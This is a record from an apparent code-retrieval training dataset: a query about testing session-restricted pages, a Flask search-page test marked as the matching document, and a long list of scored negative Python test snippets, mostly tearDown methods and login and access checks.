tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def clean_up(self) -> None:\n print('Doing some clean-up work...')", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self) -> None:\n pass", "def tearDown(self) -> None:\n pass", "def tearDown(self) -> None:\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n self.teardown_beets()", "def tearDown(self):\n pass #because we dont have anything to tearDown.", "def execute(self):\n for test in self.tests:\n test.execute()\n self.logger.dump()\n print(\"Finished!\")", "def end(self) -> None:", "def finish(self):\n if self.failed:\n print \"%s failed. %s of %s assertions passed.\" % (\n self.failed, self.passed, self.failed + self.passed)\n else:\n print \"%s of %s assertions passed.\" % (self.passed, self.passed)\n\n self.failed = self.passed = 0", "def test_teardown(self):\n assert self.search_behaviour.teardown() is None\n self.assert_quantity_in_outbox(0)", "def tearDown(self):\r\n testing.tearDown()", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def finish(self) -> None:\n self.__exit__(None, None, None)", "def test_teardown(self):\n assert self.http_handler.teardown() is None\n self.assert_quantity_in_outbox(0)", "def tearDown(self) -> None:\n\n logging.info(f\"{'=' * 20}Test completed!{'=' * 20}\")\n logging.info(\"Failed to execute the following parameter combinations: \")\n if self.error_params:\n for each in self.error_params:\n logging.info(each)", "def complete_run():\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass" ]
[ "0.7842646", "0.7775997", "0.77741504", "0.77669877", "0.76620615", "0.7591832", "0.74713165", "0.7361014", "0.73159444", "0.7298099", "0.72939897", "0.72939897", "0.7259042", "0.723601", "0.72323287", "0.7225132", "0.7225132", "0.72186595", "0.720453", "0.720453", "0.720453", "0.71972543", "0.7169602", "0.7169602", "0.7169602", "0.7156569", "0.71476275", "0.71394765", "0.7076665", "0.7076665", "0.7069562", "0.7041864", "0.703863", "0.703863", "0.7033583", "0.70185405", "0.70185405", "0.70185405", "0.70185405", "0.700787", "0.7004232", "0.69977206", "0.69977206", "0.69977206", "0.6989269", "0.69696915", "0.6961437", "0.69561034", "0.6955026", "0.6955026", "0.6953118", "0.69132566", "0.69062877", "0.69062877", "0.68875617", "0.6877217", "0.6877217", "0.68729943", "0.6852672", "0.6852672", "0.6852672", "0.68484807", "0.68444866", "0.68266255", "0.68266255", "0.68266255", "0.6826606", "0.6801074", "0.6786863", "0.67829174", "0.6780355", "0.6780355", "0.6780355", "0.6780355", "0.6780355", "0.67755795", "0.6770378", "0.6770378", "0.6770378", "0.6770378", "0.67644274", "0.67644274", "0.67644274", "0.67625135", "0.67589056", "0.6756688", "0.6751851", "0.67496306", "0.67349356", "0.6733076", "0.673071", "0.67240155", "0.6721047", "0.671874", "0.671278", "0.67090124", "0.6698873", "0.6698873", "0.6698873", "0.6698873", "0.6698873" ]
0.0
-1
Test this page can only be reached if user is in session
def test_user_profile_page(self): result = self.client.get("/profile", follow_redirects=True) self.assertIn(b"User ID", result.data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_session_not_accessed(self):\n response = self.client.get(\"/auth_processor_no_attr_access/\")\n self.assertContains(response, \"Session not accessed\")", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_in(self):\n response = self.c.get(reverse(submit_point), {'lat': 34.0, 'lng': 45.3, 'zoom': 13})\n self.assertEqual(response.status_code, 403)", "def __before__(self):\n \n if not u'REMOTE_USER' in session: \n if not request.environ[u'PATH_INFO'] in self.public_urls:\n log.debug('PATH_INFO: %s' % request.environ[u'PATH_INFO'])\n #session[u'path_before_login'] = request.environ[u'PATH_INFO']\n #session.save()\n redirect(url('/users/index'))", "def test_professor_can_login_to_web_portal(professor):", "def test_unauthenticated(self):\n self.browser.open(\"http://nohost/plone/full_review_list\")\n self.assertTrue(\"Login Name\" in self.browser.contents)", "def test_session_is_accessed(self):\n response = self.client.get(\"/auth_processor_attr_access/\")\n self.assertContains(response, \"Session accessed\")", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def test_not_logged_in(self):\n response = self.c.get(reverse(map_page), {'lat': 34.0, 'lng': 45.3})\n self.assertEqual(response.status_code, 200)", "def verify_privileged(self):\n community_text = self.fetch(self.base_url + \"/community\")\n return \"You must be logged in to see this page.\" not in community_text", "def test_login_required(self):\n self.client.logout()\n response = self.client.post(self.get_url(), {})\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def assert_accessible(self, url):\n try:\n response = self.client.get(url, follow=True)\n self.assertEqual(response.status_code, 200)\n self.login()\n response = self.client.get(url, follow=True)\n self.assertEqual(response.status_code, 200)\n self.logout()\n except Exception as exc: # pragma: no cover\n exc.args += ((url),)\n raise", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def _check_session_valid(request):\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason=\"Access denied!\")\n\n if \"analytics\" not in request.session:\n err = \"Could not fetch analytic session data.\"\n return HttpResponseBadRequest(reason=err)\n\n return None", "def test_func(self):\n if not self.request.user.is_authenticated:\n return False\n if self.request.user.is_staff:\n return True\n return self.get_user() == self.request.user", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def testNoPermission(self):\n self.login_user(self.user)\n response = self.client.get(self.url, self.args)\n self.assertEqual(response.status_code, 302)", "def test_session_state_for_unused_flash(self):\n self.response = self.client.get(reverse(views.render_template))\n self.assertFalse(_SESSION_KEY in self.client.session)", "def test_unauthenticated(self):\n self.logout_user()\n\n response = self.client.get(self.api_link)\n self.assertContains(response, \"sign in to use private threads\", status_code=403)", "def test_user_not_authorized(self):\n response = self.client.post(self.url)\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def test_04_admin_featured_apps_as_anonymous(self):\r\n res = self.app.get('/admin/featured', follow_redirects=True)\r\n assert \"Please sign in to access this page\" in res.data, res.data", "def test_category_view_not_logged_in(testapp):\n from webtest.app import AppError\n with pytest.raises(AppError, message=\"403 Forbidden\"):\n testapp.get('/category/1')", "def test_admin_can_login_to_web_portal(admin):", "def is_logged_in():\n return 'user' in session", "def test_journal_route_accessible_only_if_logged_in(self):\n response = self.client.get(reverse_lazy('journal'))\n self.assertEqual(response.status_code, 302)", "def user_in_session():\n return 'user_id' in login_session", "def test_func(self):\n return self.request.user.is_superuser", "def test_dashboard_not_signed(self):\n views_url = ('/dashboard/',\n '/accounts/picture/')\n #create a get request\n for view in views_url:\n response = self.client.get(view)\n #the user was not logged in, the user should be redirected\n self.assertEqual(response.status_code, 302,\n msg=str(response.request))", "def test_logged_user_can_access(self):\n\n utils.create_user_and_authenticate(self)\n utils.test_can_access(self, self.url)", "def test_anonymous(self):\n self.logout_user()\n\n response = self.client.get(self.api_link)\n self.assertContains(response, \"sign in to use private threads\", status_code=403)", "def test_not_logged_in(self):\n\n # test show album\n self.perm_escalate_helper(self.albumcontrol, self.showalbumrequest, self.testalbum, self.testalbum.id,\n AnonymousUser(), album.display_album, ALBUM_PUBLIC)\n\n # test photo view\n self.perm_escalate_helper_get_with_client(self.albumcontrol, self.testalbum, self.photo.id,\n \"photoid\", \"show_photo\", ALBUM_PUBLIC)\n\n # test individual photo view page\n self.perm_escalate_helper(self.albumcontrol, self.indivphotorequest, self.testalbum, self.photo.id,\n AnonymousUser(), album.display_photo, ALBUM_PUBLIC)", "def test_func(self):\n return self.request.user.has_permission(\"core.view_staffer\")", "def test_signin_page_bypass(self):\r\n # Test that they do signin if they don't have a cert\r\n response = self.client.get(reverse('signin_user'))\r\n self.assertEqual(200, response.status_code)\r\n self.assertTrue('login_form' in response.content\r\n or 'login-form' in response.content)\r\n\r\n # And get directly logged in otherwise\r\n response = self.client.get(\r\n reverse('signin_user'), follow=True,\r\n SSL_CLIENT_S_DN=self.AUTH_DN.format(self.USER_NAME, self.USER_EMAIL))\r\n self.assertEquals(('http://testserver/dashboard', 302),\r\n response.redirect_chain[-1])\r\n self.assertIn(SESSION_KEY, self.client.session)", "def test_authentication_is_not_required(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def is_allowed_to_submit(request):\n return not settings.REQUIRE_LOGIN or request.user.is_authenticated()", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test__user_passed_as_none(self):\r\n access.has_access(None, 'staff', 'global', None)", "def assert_cannot_view(obj):\n selenium_utils.open_url(obj.url)\n assert ui_utils.is_error_403()", "def test_unauthenticated_resource_allowed(self):\n raise NotImplementedError # FIXME", "def test_private_pages_auth(self):\r\n auth_pages = (\r\n '/course/',\r\n )\r\n\r\n # These are pages that should just load when the user is logged in\r\n # (no data needed)\r\n simple_auth_pages = (\r\n '/course/',\r\n )\r\n\r\n # need an activated user\r\n self.test_create_account()\r\n\r\n # Create a new session\r\n self.client = AjaxEnabledTestClient()\r\n\r\n # Not logged in. Should redirect to login.\r\n print('Not logged in')\r\n for page in auth_pages:\r\n print(\"Checking '{0}'\".format(page))\r\n self.check_page_get(page, expected=302)\r\n\r\n # Logged in should work.\r\n self.login(self.email, self.pw)\r\n\r\n print('Logged in')\r\n for page in simple_auth_pages:\r\n print(\"Checking '{0}'\".format(page))\r\n self.check_page_get(page, expected=200)", "def test_registration_page_bypass(self):\r\n response = self.client.get(\r\n reverse('register_user'), follow=True,\r\n SSL_CLIENT_S_DN=self.AUTH_DN.format(self.USER_NAME, self.USER_EMAIL))\r\n self.assertEquals(('http://testserver/dashboard', 302),\r\n response.redirect_chain[-1])\r\n self.assertIn(SESSION_KEY, self.client.session)", "def test_homepage_logged_in_except(self):\r\n\r\n u1 = User.query.filter_by(username='testuser').one()\r\n u1.location = 'US-FAKE'\r\n db.session.add(u1)\r\n db.session.commit()\r\n\r\n with self.client as c:\r\n with c.session_transaction() as sess:\r\n sess[CURR_USER_KEY] = u1.id\r\n response = c.get('/')\r\n self.assertEqual(response.status_code, 200)\r\n self.assertIn(b'No data found for your region.', response.data)", "def test_shred_login():\n assert_redirect_to_login('/shred/')\n assert_not_redirect_to_login('/shred/')", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_instructor_page_access_nonstaff(self):\r\n self.login(self.enrolled_user)\r\n\r\n urls = [reverse('instructor_dashboard', kwargs={'course_id': self.course.id.to_deprecated_string()}),\r\n reverse('instructor_dashboard', kwargs={'course_id': self.test_course.id.to_deprecated_string()})]\r\n\r\n # Shouldn't be able to get to the instructor pages\r\n for url in urls:\r\n check_for_get_code(self, 404, url)", "def require_login(self):\n\tif users.get_current_user():\n\t return True\n\telse:\n\t self.redirect(users.create_login_url(self.request.uri))\n\t return False", "def test_get_main_page_without_logged_in_user(self):\n response = self.testapp.get('/')\n self.assertEqual(response.status_int, 200)", "def test_aio_can_login_to_web_portal(aio):", "def before_request() -> None:\n if current_user.is_anonymous() or not current_user.is_allowed():\n abort(401)", "def test_func(self):\n return self.request.user.is_active # any active user", "def test_page_view_permission(self):\n \n adminonlypage = create_page_in_admin(self.testproject,\"adminonlypage\",\n permission_lvl=Page.ADMIN_ONLY) \n registeredonlypage = create_page_in_admin(self.testproject,\"registeredonlypage\",\n permission_lvl=Page.REGISTERED_ONLY)\n publicpage = create_page_in_admin(self.testproject,\"publicpage\",\n permission_lvl=Page.ALL)\n \n self._test_page_can_be_viewed(self.projectadmin,adminonlypage)\n self._test_page_can_not_be_viewed(self.participant,adminonlypage)\n self._test_page_can_not_be_viewed(self.registered_user,adminonlypage) \n self._test_page_can_not_be_viewed(None,adminonlypage) # None = not logged in\n \n self._test_page_can_be_viewed(self.projectadmin,registeredonlypage)\n self._test_page_can_be_viewed(self.participant,registeredonlypage)\n self._test_page_can_not_be_viewed(self.registered_user,registeredonlypage)\n self._test_page_can_not_be_viewed(None,registeredonlypage) # None = not logged in\n \n self._test_page_can_be_viewed(self.projectadmin,publicpage)\n self._test_page_can_be_viewed(self.participant,publicpage)\n self._test_page_can_be_viewed(self.registered_user,publicpage)\n self._test_page_can_be_viewed(None,publicpage) # None = not logged in", "def logged_in(request):\n return request.current_user is not None", "def test_user_isnt_admin():\n app = create_ctfd()\n with app.app_context():\n register_user(app)\n client = login_as_user(app)\n for page in ['pages', 'teams', 'scoreboard', 'chals', 'statistics', 'config']:\n r = client.get('/admin/{}'.format(page))\n assert r.location.startswith(\"http://localhost/login?next=\")\n assert r.status_code == 302\n destroy_ctfd(app)", "def test_not_logged_cannot_create_tab(self):\n\n utils.test_not_logged_cannot_access(self, self.url, self.data)", "def test_01_front_page(self):\r\n url = '/'\r\n # As Anonymou user\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should not be shown to anonymous users\"\r\n assert dom.find(id='top_users') is None, err_msg\r\n # As Authenticated user but NOT ADMIN\r\n self.signin()\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should not be shown to authenticated users\"\r\n assert dom.find(id='top_users') is None, err_msg\r\n self.signout\r\n # As Authenticated user but ADMIN\r\n res = self.signin(email=self.root_addr, password=self.root_password)\r\n print res.data\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to admin\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout()", "def logged_in(self):\n return self.auth.get_user_by_session() is not None", "def deny_access():\n flash('You must login first.')\n return redirect(url_for('home'))", "def test_logged_in_not_friend(self):\n\n # log in\n self.make_logged_in_not_friend()\n\n # test show album\n self.perm_escalate_helper(self.albumcontrol, self.showalbumrequest, self.testalbum, self.testalbum.id,\n self.u2, album.display_album, ALBUM_PUBLIC)\n\n # test photo view\n self.perm_escalate_helper_get_with_client(self.albumcontrol, self.testalbum, self.photo.id,\n \"photoid\", \"show_photo\", ALBUM_PUBLIC)\n\n # test individual photo view page\n self.perm_escalate_helper(self.albumcontrol, self.indivphotorequest, self.testalbum, self.photo.id,\n self.u2, album.display_photo, ALBUM_PUBLIC)", "def test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def test_logged_user_can_access(self):\n\n utils.create_user_and_authenticate(self)\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def is_logged_in(session):\n return 'user' in session", "def validate_login(self, request):\n\n if 'id' not in request.session or 'steam_id' not in request.session:\n raise PermissionDenied('You need to login')\n\n # if self.mode9:\n # if 'team' not in PlayerList[request.session['id']]:\n # raise PermissionDenied('Player is not in a team!')", "def test_01_front_page(self):\r\n url = '/'\r\n # As Anonymou user\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to anonymous users\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n # As Authenticated user but NOT ADMIN\r\n self.signin()\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to authenticated users\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout\r\n # As Authenticated user but ADMIN\r\n self.signin(email=self.root_addr, password=self.root_password)\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to admin\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout()", "def login_web_required(view_func):\r\n @wraps(view_func, assigned=available_attrs(view_func))\r\n def _wrapped_view_func(request, *args, **kwargs):\r\n if hasattr(request, \"session\") and request.session.get('is_logon', False) and request.user.is_active:\r\n return view_func(request, *args, **kwargs)\r\n else:\r\n return HttpResponse(FailResponse(u'请先登录'))\r\n return _wrapped_view_func", "def test_if_an_user_c_access_administration_panel(client):\n response = client.get(\"/admin/\")\n assert response.status_code != 200", "def testDenyAllowAccess(self):\n self.host.ContinueAuth()\n self.host.SignIn(self.account['username'], self.account['password'])\n self.host.DenyAccess()\n self.host.ContinueAuth()\n self.host.AllowAccess()", "def test_no_redirect(self):\n self.create_user_and_login(\n agreed_to_terms_of_service=True,\n filled_out=True\n )\n\n resp = self.client.get(DASHBOARD_URL)\n assert resp.status_code == 200", "def __require_privilaged_access(self):\n if not self.getLoggedInUser():\n raise codechecker_api_shared.ttypes.RequestFailed(\n codechecker_api_shared.ttypes.ErrorCode.UNAUTHORIZED,\n \"The server must be start by using privilaged access to \"\n \"execute this action.\")", "def test_assessor_access_limited(self):\n assessor = get_or_create_default_assessor()\n self.client.login(assessor.email)\n # This assessor doesn't belong to a group\n self.assertTrue(is_assessor(assessor))\n self.assertFalse(get_user_assessor_groups(assessor))\n\n # forbidden\n urls_get_forbidden = [\n reverse('wl_applications:enter_conditions', args=[self.application.pk]),\n reverse('wl_applications:enter_conditions_assessor', args=[self.application.pk, self.assessment.pk]),\n ]\n urls_post_forbidden = [\n {\n 'url': reverse('wl_applications:create_condition', args=[self.application.pk]),\n 'data': {\n 'code': '123488374',\n 'text': 'condition text'\n }\n },\n {\n 'url': reverse('wl_applications:set_assessment_condition_state'),\n 'data': {\n 'assessmentConditionID': self.assessment_condition.pk,\n 'acceptanceStatus': 'accepted',\n }\n },\n {\n 'url': reverse('wl_applications:enter_conditions', args=[self.application.pk]),\n 'data': {\n 'conditionID': [self.condition.pk],\n }\n },\n {\n 'url': reverse('wl_applications:enter_conditions_assessor',\n args=[self.application.pk, self.assessment.pk]),\n 'data': {\n 'conditionID': [self.condition.pk],\n }\n },\n ]\n # Allowed\n urls_get_allowed = [\n reverse('wl_applications:search_conditions')\n ]\n urls_post_allowed = [\n ]\n for url in urls_get_forbidden:\n response = self.client.get(url, follow=True)\n if response.status_code != 403:\n self.assertRedirects(response, reverse('wl_dashboard:tables_assessor'), status_code=302,\n target_status_code=200)\n for url in urls_post_forbidden:\n response = self.client.post(url['url'], url['data'], follow=True)\n if response.status_code != 403:\n self.assertRedirects(response, reverse('wl_dashboard:tables_assessor'), status_code=302,\n target_status_code=200)\n for url in urls_get_allowed:\n response = self.client.get(url, follow=True)\n self.assertEqual(200, response.status_code)\n\n for url in urls_post_allowed:\n response = self.client.post(url['url'], url['data'], follow=True)\n self.assertEqual(200, response.status_code)", "def test_no_access_without_login(self):\n response = self.client.get(reverse('question_list'), follow=True)\n expected_url = reverse('home') + \"?next=\" + reverse('question_list')\n self.assertRedirects(response, expected_url, status_code=302, \n target_status_code=200)\n expected_url = reverse('home') + \"?next=\" + reverse('question_add')\n response = self.client.get(reverse('question_add'), follow=True)\n self.assertRedirects(response, expected_url, status_code=302, \n target_status_code=200)", "def test_webdriver_not_authenticated(live_server, env_browser):\n browser = env_browser\n browser.get(flask.url_for(\"security.change_password\", _external=True))\n assert flask.url_for(\"security.login\", _external=True) in browser.current_url", "def test_login_required(self):\n res = self.client.get(INGREDIENTS_URL)\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_not_logged_user_cannot_leave(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_login_required():\n pass", "def session_required(view):\n def validation(*args, **kwargs):\n request = args[0]\n if request.session.get('email', None):\n return view(*args, **kwargs)\n else:\n return HttpResponseForbidden('403 Forbbiden, You have to login first to use this amazing app')\n return validation", "def is_impersonated_session(request):\n return (\n hasattr(request, \"session\") and la_settings.USER_SESSION_FLAG in request.session\n )", "def test_not_logged_cannot_delete(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_authenticated(self):\n response = self.client.get(telemetry_url)\n self.assertEqual(403, response.status_code)", "def test_00_anonymous(self):\r\n res = self.app.get(self.url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"The CKAN exporter should not be available for anon users\"\r\n assert dom.find(id=\"ckan\") is None, err_msg", "def test_token(self):\n api_response = requests.get(self.api_config.get_api_url() + \"greetings/isloggedin\",\n headers={\"Authorization\": \"Bearer \" + self.API_TOKEN})\n\n if api_response.status_code == 401 or 403:\n return False\n else:\n return True", "def test_anonymous_user(self):\r\n self.request.user = AnonymousUser()\r\n context = user_has_cart_context_processor(self.request)\r\n self.assertFalse(context['display_shopping_cart'])", "def test_auth_public_unowned(self):\n self.do_visible(True, 'pattieblack', True, tenant='froggy')", "def test_if_forbiden_for_authenticated_permissions(self):\r\n res = self.client_authenticated.get(reverse(LIST_USER_URL),data={})\r\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)" ]
[ "0.7483035", "0.743996", "0.743996", "0.743996", "0.743996", "0.73823667", "0.7071074", "0.7004314", "0.7000037", "0.69217306", "0.6881494", "0.68084276", "0.68084276", "0.6783943", "0.67708766", "0.67426723", "0.6722217", "0.6721236", "0.6721236", "0.6721236", "0.6698859", "0.667831", "0.66518945", "0.66518945", "0.66518945", "0.66518945", "0.66455007", "0.66226435", "0.6596173", "0.65856487", "0.65641403", "0.65631926", "0.65609604", "0.65548426", "0.6545462", "0.6540188", "0.65247715", "0.65233016", "0.64949626", "0.6493033", "0.6479915", "0.6468787", "0.6463022", "0.64562196", "0.64526683", "0.6449491", "0.6449491", "0.6449491", "0.6449491", "0.6428942", "0.64245546", "0.6424506", "0.64243764", "0.64224505", "0.64174753", "0.6409176", "0.6408951", "0.6408951", "0.6408951", "0.6408951", "0.6408379", "0.6404869", "0.64023674", "0.6394072", "0.6379277", "0.6377155", "0.6374992", "0.6371757", "0.6366519", "0.6366092", "0.63619465", "0.6349594", "0.63396287", "0.6337581", "0.632101", "0.632101", "0.632101", "0.63083684", "0.63041055", "0.6302303", "0.6292932", "0.6283326", "0.6282739", "0.6281525", "0.6280755", "0.62749076", "0.6274882", "0.62743866", "0.62677187", "0.6254656", "0.625206", "0.624774", "0.6247272", "0.62447745", "0.6241966", "0.62295806", "0.62251514", "0.6221875", "0.62196773", "0.62184656", "0.62132096" ]
0.0
-1
Test this page can only be reached if user is in session
def test_search_page(self): result = self.client.get("/search") self.assertIn(b"Search", result.data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_session_not_accessed(self):\n response = self.client.get(\"/auth_processor_no_attr_access/\")\n self.assertContains(response, \"Session not accessed\")", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_in(self):\n response = self.c.get(reverse(submit_point), {'lat': 34.0, 'lng': 45.3, 'zoom': 13})\n self.assertEqual(response.status_code, 403)", "def __before__(self):\n \n if not u'REMOTE_USER' in session: \n if not request.environ[u'PATH_INFO'] in self.public_urls:\n log.debug('PATH_INFO: %s' % request.environ[u'PATH_INFO'])\n #session[u'path_before_login'] = request.environ[u'PATH_INFO']\n #session.save()\n redirect(url('/users/index'))", "def test_professor_can_login_to_web_portal(professor):", "def test_unauthenticated(self):\n self.browser.open(\"http://nohost/plone/full_review_list\")\n self.assertTrue(\"Login Name\" in self.browser.contents)", "def test_session_is_accessed(self):\n response = self.client.get(\"/auth_processor_attr_access/\")\n self.assertContains(response, \"Session accessed\")", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def test_not_logged_in(self):\n response = self.c.get(reverse(map_page), {'lat': 34.0, 'lng': 45.3})\n self.assertEqual(response.status_code, 200)", "def verify_privileged(self):\n community_text = self.fetch(self.base_url + \"/community\")\n return \"You must be logged in to see this page.\" not in community_text", "def test_login_required(self):\n self.client.logout()\n response = self.client.post(self.get_url(), {})\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def assert_accessible(self, url):\n try:\n response = self.client.get(url, follow=True)\n self.assertEqual(response.status_code, 200)\n self.login()\n response = self.client.get(url, follow=True)\n self.assertEqual(response.status_code, 200)\n self.logout()\n except Exception as exc: # pragma: no cover\n exc.args += ((url),)\n raise", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def _check_session_valid(request):\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason=\"Access denied!\")\n\n if \"analytics\" not in request.session:\n err = \"Could not fetch analytic session data.\"\n return HttpResponseBadRequest(reason=err)\n\n return None", "def test_func(self):\n if not self.request.user.is_authenticated:\n return False\n if self.request.user.is_staff:\n return True\n return self.get_user() == self.request.user", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def testNoPermission(self):\n self.login_user(self.user)\n response = self.client.get(self.url, self.args)\n self.assertEqual(response.status_code, 302)", "def test_session_state_for_unused_flash(self):\n self.response = self.client.get(reverse(views.render_template))\n self.assertFalse(_SESSION_KEY in self.client.session)", "def test_unauthenticated(self):\n self.logout_user()\n\n response = self.client.get(self.api_link)\n self.assertContains(response, \"sign in to use private threads\", status_code=403)", "def test_user_not_authorized(self):\n response = self.client.post(self.url)\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def test_04_admin_featured_apps_as_anonymous(self):\r\n res = self.app.get('/admin/featured', follow_redirects=True)\r\n assert \"Please sign in to access this page\" in res.data, res.data", "def test_category_view_not_logged_in(testapp):\n from webtest.app import AppError\n with pytest.raises(AppError, message=\"403 Forbidden\"):\n 